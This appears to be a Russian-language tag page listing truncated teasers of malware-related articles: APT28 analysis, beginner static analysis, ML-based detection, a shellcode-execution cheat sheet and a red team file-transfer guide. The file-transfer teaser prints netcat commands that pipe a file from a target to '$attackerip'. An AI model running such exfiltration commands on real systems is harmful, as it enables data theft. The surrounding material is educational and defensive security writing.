Публикации по теме 'malware'


Расширенный анализ вредоносного ПО APT28
APT28 , также известная как Sofacy , Fancy Bear и Pawn Storm , представляет собой печально известную продвинутую постоянную угрозу (APT). ), которая активно действует по крайней мере с 2007 года. APT28 считается спонсируемой государством группой, связанной с правительством России , и была замешана в нескольких крупных профильные кибератаки, в том числе президентские выборы в США 2016 года. В этом сообщении блога мы проведем всесторонний анализ вредоносного ПО APT28, изучая его..

Статический анализ для начинающих
Приветствую — меня зовут Лиам, и я зарабатываю на жизнь защитой данных. По моему опыту, лучший способ защитить систему — это знать ее изнутри и снаружи. Я думаю о зрелости реакции на вредоносное ПО следующим образом: уровень 1 == Сетевая блокировка машины и переустановка образа Уровень 2 == Возьмите образец вредоносного ПО и запустите его в песочнице. Уровень 3 == Анализ и дизассемблирование вредоносного ПО на ассемблере Уровень 4 == Используйте отладчик в сочетании с..

Влияние машинного обучения: эволюция обнаружения вредоносных программ
В мире кибербезопасности методы машинного обучения (МО) меняют подход к борьбе с вредоносным ПО, совершенствуя стратегии борьбы с угрозами. Способность машинного обучения обнаруживать скрытые закономерности совершает революцию в обнаружении вредоносных программ , повышая ее эффективность. Алгоритмы машинного обучения углубляются в данные, выявляя скрытые закономерности, упущенные традиционными системами. Анализируя различные функции и поведение, эти алгоритмы быстро выявляют..

Выполнение кода с помощью обратных вызовов CheatSheet
Введение Добро пожаловать в мою новую статью, эта статья представляет собой шпаргалку, показывающую все параметры, которые у вас есть для выполнения шелл-кода на компьютере с Windows. Он также показывает все параметры, которые отправляются в VirusTotal. Базовое выполнение шелл-кода Это не использование обратных вызовов, но это самый простой способ выполнить шелл-код и увидеть его. #include <windows.h> #include <stdio.h> #include <stdlib.h> #include..

Передача файлов Red Team, все способы
Передача файлов Netcat Шаг 1 Создайте файл в целевом поле в каталоге /tmp touch file.txt Настройте прослушиватель и направьте STDOUT в новый файл. nc -nlvp 1234 > file.txt Отправить файл nc [target box ip] 1234 < file-to-be-transfered.txt Способ второй На атакующей машине запустите: nc -lvp 443> transfer.txt На целевом пробеге: cat transfer.txt | nc $attackerip 443 NC Transfer с данными gzip //on target machine nc -nvlp 10000 | gzip -d >..

Машинное обучение в обнаружении вредоносных программ: концепция, методы и варианты использования
1- Введение Появление Интернета, несомненно, принесло обществу множество преимуществ. Однако это также способствовало совершению кибератак против отдельных лиц и корпораций. Распространенность вредоносного ПО как цифровой угрозы — общепризнанный факт. Он может проникать на различные технологические платформы, такие как компьютеры, мобильные устройства и сети, тем самым ставя под угрозу конфиденциальность, целостность и доступность конфиденциальной информации и финансовых ресурсов...

Практический анализ вредоносных программ: введение
Первоначально опубликовано на https://pranavc.tech/ . Введение Ранее в этом году я хотел заняться анализом вредоносных программ, я предпочитаю изучать вещи на практике, поэтому я попросил одного из своих профессоров порекомендовать подходящие ресурсы, он сказал мне проверить Практический анализ вредоносных программ Эндрю Хонига и Майкла Сикорски . Мой опыт Лично я получил массу удовольствия от этой книги, хотя книга довольно старая, я считаю, что представленная информация (в..